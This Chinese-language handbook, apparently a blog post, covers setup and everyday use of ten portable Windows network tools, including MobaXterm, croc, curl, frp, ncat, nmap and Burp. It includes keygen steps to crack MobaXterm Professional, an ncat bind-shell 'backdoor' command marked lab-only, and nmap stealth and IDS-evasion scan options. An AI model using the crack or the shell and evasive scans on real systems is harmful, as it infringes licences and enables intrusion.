一、网络工具分四类
按"我在 Windows 上到底要干什么"分四类:
| 类别 | 工具 |
|---|
| 终端 / SSH | MobaXterm、WindTerm |
| 文件传输 | croc、syncthing、TCPCOM |
| 网络探测 | curl、ncat、nmap、frp |
| 代理 / 测试 | burp(Web 代理)、Frp(内网穿透) |
本文把十款工具的绿色版配置 + 实战 + 坑点串成一份手册。
二、终端之王:MobaXterm
2.1 简介
mobaxterm.mobatek.net —— Windows 终端的事实标准。免费 Personal 版够用,但有会话数限制(12 个)和SSH 隧道数量限制。
2.2 中文版与破解
社区维护两个中文项目:
破解思路(仅供学习,商业请购买 Professional):
1
2
3
4
5
6
7
8
| # 1. 启动 keygen 网站
https://moba-x-term-keygen.vercel.app/
# 2. 解压 MobaXterm,把 Custom.mxtpro 放进 MobaXterm 安装目录
# 3. 重启 MobaXterm → 顶部显示 "Professional"
# 注意:不支持默认编码是 UTF-8 的 Windows 系统(显示中文乱码)
# 绝大多数 Windows 中文版默认 GBK/GB2312,正常显示
|
2.3 免密码登录:密钥对
MobaXterm 集成 PuTTY 的密钥体系。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| # Step 1: 生成密钥对
Tools → MobaKeyGen (SSH key generator)
→ Generate → 鼠标在进度条下方移动产生随机数
→ Save public key → authorized_keys
→ Save private key → mk.ppk
# Step 2: 公钥上传到服务器
ssh-copy-id -i ~/.ssh/mk.ppk.pub user@<host> # 需先在服务器有密码登录
# 或者手动:
mkdir -p ~/.ssh
chmod 700 ~/.ssh
cat authorized_keys >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Step 3: 服务器 sshd_config
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PermitRootLogin yes # 或者 no 禁止 root 登录
PasswordAuthentication no # 关闭密码登录,强制密钥
service sshd restart
# Step 4: MobaXterm 用私钥登录
Sessions → New SSH → Advanced SSH settings
→ Use private key → 选 mk.ppk
|
2.4 忘记主密码重置
MobaXterm 把所有保存的会话密码加密存在 MobaXterm.ini,忘记主密码后用官方重置工具:
1
2
3
4
5
| 1. 访问 https://mobaxterm.mobatek.net/resetmasterpassword.html
2. 下载 ResetMasterPassword.zip
3. 把 ResetMasterPassword.exe 与 MobaXterm.exe 放到同一目录
4. 双击运行,提示"所有保存的密码将丢失" → 是
5. 重启 MobaXterm,重新设新密码
|
三、WindTerm:现代免费终端
3.1 简介
kingToolbox/WindTerm —— 2020+ 出现的国产开源终端,完全免费 + 跨平台(Windows / macOS / Linux)。
3.2 优势 vs MobaXterm
1
2
3
4
5
6
7
8
| ✓ 完全免费无功能限制
✓ 现代化 UI(VSCode 风格)
✓ 协议支持:SSH / SFTP / Serial / Telnet / RDP / VNC / WSL
✓ 内置 SFTP 面板
✓ 支持多标签 + 面板分割
✓ 性能更好(Go + Web 后端)
✗ 主题生态不如 MobaXterm 丰富
✗ 远程会话管理功能弱
|
3.3 下载
1
| https://github.com/kingToolbox/WindTerm/releases/download/2.5.0/WindTerm_2.5.0_Windows_Portable_x86_64.zip
|
四、croc:跨端 P2P 文件传输
4.1 简介
schollz/croc —— 一句话描述:带中继的 scp。
4.2 优势
- 不需要双方都装服务端;
- 用 code 做配对(6 字符短码),免 IP 免配对;
- 默认走官方 relay(已 E2E 加密);
- 自带中继可私有部署;
- 跨平台:Windows / macOS / Linux / Android / iOS。
4.3 实战
1
2
3
4
5
6
7
8
9
10
11
12
13
| # 1. 发送方
croc send --code <自定义code> <文件/目录>
例:croc send --code myshare123 C:\Users\me\demo.zip
输出:Code is: myshare123
On the other computer run:
croc myshare123
# 2. 接收方
croc <code>
例:croc myshare123
输出:Connecting... ok
> receiving demo.zip (12.4 MB)
100% |█████████████| [12.4MB/s]
|
4.4 高级用法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # 指定中继
croc --relay <relay-host>:9009 send --code test123 file.zip
# 自签中继
croc relay # 默认 :9009
# 发送目录
croc send --code share C:\workspace\project\
# 接收重命名
croc myshare123 > received.zip
# 排除文件
croc send --exclude "*.tmp" --code share1 project/
|
4.5 与 SCP 对比
| 维度 | croc | scp |
|---|
| 配对 | 短码 | IP + 账号 + 密码 |
| 中继 | 自带(可私有) | 无 |
| 大文件 | 流式,分块 | 流式 |
| 跨平台 | 全 | 需 SSH 客户端 |
| 进度条 | 漂亮 | 简陋 |
| 加密 | E2E | 依赖 SSH |
五、curl:HTTP 瑞士军刀
5.1 下载
curl.se/download.html —— Windows 绿色版在 curl.se/windows。
1
2
| 解压到 D:\portable\dev\curl\
PATH=%PATH%;D:\portable\dev\curl\bin
|
5.2 常用模式
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| # GET
curl https://api.github.com/users/octocat
# POST JSON
curl -X POST https://api.example.com/users \
-H "Content-Type: application/json" \
-d '{"name":"alice","email":"alice@example.com"}'
# 表单提交
curl -X POST https://example.com/login \
-d "user=alice&pass=secret"
# 文件上传
curl -X POST https://example.com/upload \
-F "file=@C:/test.zip"
# 下载文件
curl -O https://example.com/file.zip
curl -o rename.zip https://example.com/file.zip
# 跟随重定向
curl -L https://bit.ly/xxxxx
# 显示响应头
curl -I https://example.com # HEAD
curl -i https://example.com # 头部 + body
# 走代理
curl --proxy socks5://127.0.0.1:1080 https://google.com
# 跳过证书
curl -k https://self-signed.example.com
# 详细调试
curl -v https://example.com # -vv 更详细
|
六、frp:内网穿透神器
6.1 简介
fatedier/frp —— 把内网机器暴露到公网的开源反向代理。
6.2 架构
1
2
3
| 内网主机 (frpc) ──> 公网 VPS (frps) ──> Internet 用户
↑ 反向连接 ↑
主动发起,被动接收
|
6.3 服务端(公网 VPS)配置
frps.ini:
1
2
3
4
5
6
| [common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = {{REDACTED}}
token = {{REDACTED}}
|
启动:
1
| nohup ./frps -c frps.ini &
|
6.4 客户端(内网)配置
frpc.ini:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| [common]
server_addr = {{PUBLIC_IP}}
server_port = 7000
token = {{REDACTED}}
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000 # 公网用 6000 端口连
[web]
type = http
local_port = 8080
custom_domains = test.example.com
|
启动:
6.5 实战场景
1
2
3
4
| - 远程 SSH 内网机器:公网 ssh -p 6000 user@<VPS_IP>
- 临时展示本地 Web:公网访问 test.example.com
- 远程桌面 RDP:内网开 3389,frp 暴露 13389
- TCP 透传:数据库 3306 暴露到公网(注意加 auth)
|
七、ncat(Nmap 子项目):网络 IO 工具
7.1 简介
ncat 是 Nmap 项目的网络瑞士军刀(不是老 nc,ncat 默认走 nmap 安装包里的)。支持 TCP/UDP/SCTP/SSL。
7.2 下载
1
2
3
| https://nmap.org/download#windows
下载 nmap-x.x.x-setup.exe
# 选 "Register ncat path" 让 cmd/PowerShell 全局识别
|
把 ncat.exe 复制一份改名为 nc.exe,命令更顺手。
7.3 实战命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| # 1. 监听入站连接
ncat -l 8080
# 2. 连接远程
ncat 192.168.1.100 80
GET / HTTP/1.0
HEAD / HTTP/1.0
# 3. UDP 监听
ncat -l -u 1234
netstat -tunlp | findstr 1234
ncat -v -u <host> 1234
# 4. 聊天工具(局域网最快聊天)
ncat -l 8080 # 服务端
ncat 192.168.1.100 8080 # 客户端
# 5. 文件拷贝
# 接收方
ncat -l 8080 > file.txt
# 发送方(--send-only 传完即关)
ncat 192.168.1.100 8080 --send-only < data.txt
# 6. 端口转发(用 -c 创建中转)
ncat -u -l 80 -c 'ncat -u -l 8080'
# 80 端口的连接自动转到 8080
# 7. 后门(仅实验环境,**绝对禁止生产使用**)
# 服务端
ncat -l 10000 -e /bin/bash
# 客户端
ncat 192.168.1.100 10000
# Windows 端 -e 不可用,用 mkfifo 双向
# 8. 超时
ncat -w 10 192.168.1.100 8080
# 9. 长连接(-k 强制服务端不退出)
ncat -l -k 8080
|
八、nmap:端口扫描与服务识别
8.1 简介
lwn.net 文章 —— 业界标准,渗透测试和端口审计必装。
8.2 安装
1
2
| 下载 nmap-x.x.x-setup.exe → 默认装 → 把 path 加 PATH
PATH=%PATH%;D:\Program Files (x86)\Nmap
|
8.3 核心参数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| -A 综合扫描(OS + 服务版本 + 脚本 + traceroute)
-sP Ping 扫描(高效)
-Pn 跳过 ping(适合禁 ICMP 的目标)
-PS / -PA / -PR TCP SYN / ACK / ARP ping
-n 禁止 DNS 反向解析
-T0 ~ -T5 时序:T0 极慢(躲避 IDS)~T5 极速
-p 80 指定端口
-p 1-100 端口范围
-p- 所有端口(1-65535)
-F 快速模式(仅 100 个常用端口)
--top-ports 100 概率最高的前 100 端口
-sS TCP SYN 半连接扫描(隐蔽)
-sT TCP 全连接扫描
-sU UDP 扫描(极慢)
-sN / -sF 隐蔽扫描(FIN / NULL)
-sV 服务版本识别
-sV --allports 扫描所有端口的服务版本
-O 操作系统识别
--open 只显示 open 端口
-vv 详细输出
-oN / -oX / -oG 输出到普通文本 / XML / grepable
|
8.4 实战模板
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| # 1. 基础扫描
nmap 127.0.0.1
# 2. 详细扫描
nmap -vv 127.0.0.1
# 3. 端口扫描
nmap 127.0.0.1 -p 80
nmap 127.0.0.1 -p 1-1000
nmap 127.0.0.1 -p- # 1-65535
# 4. 服务版本 + 操作系统
nmap -sV -O 127.0.0.1 -p 80
# 5. 全量扫描(耗时)
nmap -A 127.0.0.1 -p- -oN nmap_full.txt
# 6. 扫描网段
nmap -sP 192.168.1.0/24
# 7. 内网审计
nmap -Pn -sT 192.168.1.100 # 跳过 ping,TCP 全连接
# 8. 看支持 HTTP 方法
nmap -p 80 --script http-methods safe.example.com
|
8.5 输出样例
1
2
3
4
5
| nmap -sS -T4 -sV --version-all <ip> -p 18554
PORT STATE SERVICE VERSION
18554/tcp open rtsp
1 service unrecognized despite returning data.
|
避坑:内网扫描遵守公司规定,未授权目标禁止扫描。scanme.nmap.org 是 nmap 官方授权的测试目标。
九、syncthing:P2P 跨端同步
9.1 简介
syncthing/syncthing —— 替代 Resilio Sync、Bt Sync 的开源方案。点对点 + 加密 + 多端。
9.2 启动
1
2
3
4
5
6
7
| 下载 syncthing-windows-amd64.zip → 解压 → 双击 syncthing.exe
# 默认 WebUI
http://127.0.0.1:8384/
# 加 GUI(推荐用 SyncTrayzor)
https://github.com/canton7/SyncTrayzor/releases
|
9.3 加设备
1
2
3
4
5
6
| 1. 设备 A 启动 syncthing → Add Device
2. 输入设备 B 的 Device ID
3. 设备 B 收到请求 → Accept
4. Add Folder → 选本地目录 → 共享给设备 B
5. 设备 B 选择接收路径
6. 双向实时同步
|
9.4 实战场景
1
2
3
4
| - 笔记本 ↔ 桌面:项目代码、配置同步
- 家里 NAS ↔ 公司电脑:办公资料
- 手机(Android/iOS)↔ 电脑:照片、文档
- 替代 Dropbox:自托管,零成本
|
十、TCPCOM:串口调试
10.1 简介
cmsoft.cn/resource/110.html —— 国内常见的串口调试助手,比 putty 直观。
10.2 实战:调嵌入式设备
1
2
3
4
5
6
| 1. 选择 COM 端口(设备管理器查)
2. 波特率 115200 / 8 / N / 1
3. ☑ HEX 显示
4. 打开串口
5. 收到嵌入式设备的启动日志
6. 配合 ncat/nmap 排查网络端口
|
十一、burp:Web 渗透测试
11.1 简介
portswigger.net/burp —— Web 渗透测试事实标准,专业工具,合法授权使用。
11.2 替代:免费社区版
2023+ Burp Suite Community Edition 完全免费,够日常使用。
11.3 下载
1
2
| https://portswigger.net/burp/releases
下载 BurpSuiteCommunity.jar
|
11.4 启动
1
| java -jar BurpSuiteCommunity.jar
|
11.5 实战:抓包改包
1
2
3
4
5
| 1. Proxy → Options → 127.0.0.1:8080
2. 浏览器装 FoxyProxy 或 SwitchyOmega 走 127.0.0.1:8080
3. 浏览器访问 HTTP 站点 → burp Proxy 拦截
4. 修改请求 → Forward
5. 改包测越权 / 注入
|
11.6 配合浏览器代理
1
2
3
4
5
| SwitchyOmega:
代理协议:HTTP
代理服务器:127.0.0.1
代理端口:8080
→ 一键切换"走 burp / 不走 burp"
|
十二、组合 SOP
12.1 应急:客户机器某个端口不通
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # 1. 本机看端口
netstat -ano | findstr 8080
# 2. 扫客户机器
nmap -Pn -p 8080 <client-ip>
# 3. 连一下测试
ncat -v <client-ip> 8080
# → open : OK
# → Connection refused : 端口没开
# → timeout : 防火墙丢包
# 4. SSH 进去
MobaXterm / WindTerm → 新建 SSH 会话 → 登录
|
12.2 跨端文件分享
1
2
3
4
5
6
7
| # 场景:把 500MB 视频从办公室电脑传给家里电脑
# 选项 A:croc(最快)
croc send --code video2024 C:\videos\demo.mp4
# 家里电脑 croc video2024
# 选项 B:syncthing(持续同步)
# 在两台机器都装 syncthing,加为设备,共享 videos 目录
|
12.3 远程客户现场
1
2
3
4
5
6
| 1. WindTerm SSH 到客户的跳板机
2. nmap 扫内网,找到目标服务端口
3. ncat 测试连通性
4. curl 拉接口返回内容
5. burp 抓包调试 HTTP 协议问题
6. frp 内网穿透开 Web 服务给客户查看
|
十三、文件归档
1
2
3
4
5
6
7
8
9
10
11
| D:\portable\net\
├── mobaxterm\ # 终端 1
├── windterm\ # 终端 2
├── croc\ # P2P 文件传输
├── curl\ # HTTP CLI
├── nmap\ # 端口扫描
├── ncat\ # 网络 IO
├── frp\ # 内网穿透
├── syncthing\ # P2P 同步
├── tcpcom\ # 串口调试
└── burp\ # Web 渗透
|
十四、常见坑
| 现象 | 原因 | 对策 |
|---|
| MobaXterm 中文乱码 | 客户端编码不匹配 | 会话属性 → Remote environment 设为 UTF-8 |
| WindTerm 启动报缺失 DLL | 缺 VC++ Runtime | 装 Visual C++ Redistributable |
| croc 走不动 relay | 公司防火墙拦截 9009 | 部署私有 relay:croc relay --ports 9009 |
| curl 在 Windows 报 SSL | 缺 CA 证书 | 用 -k 跳过或装 OpenSSL |
| nmap 扫不动 Win10 | Win10 防火墙拦截 | 加 -Pn 跳过 ping |
| frp 连不上服务端 | token 不匹配 / 端口被拦 | 检查两端 token 字符串完全一致 |
| burp 抓 HTTPS 乱码 | 证书未导入 | 浏览器访问 http://burp 下载并信任证书 |
| syncthing 同步冲突 | 双向编辑 | 设 .stignore 排除运行时文件 |
十五、下一步
- MobaXterm 进阶:用 macro 自动登录大量服务器
- WindTerm 进阶:用
windterm --help 看 CLI 自动重连 - nmap 进阶:学 NSE 脚本(
nmap --script=vuln) - burp 进阶:Intruder 模块做密码爆破、Scanner 模块做自动化漏洞扫描
- frp 进阶:HTTPS 反代、STCP 模式(点对点加密)
十六、参考资料
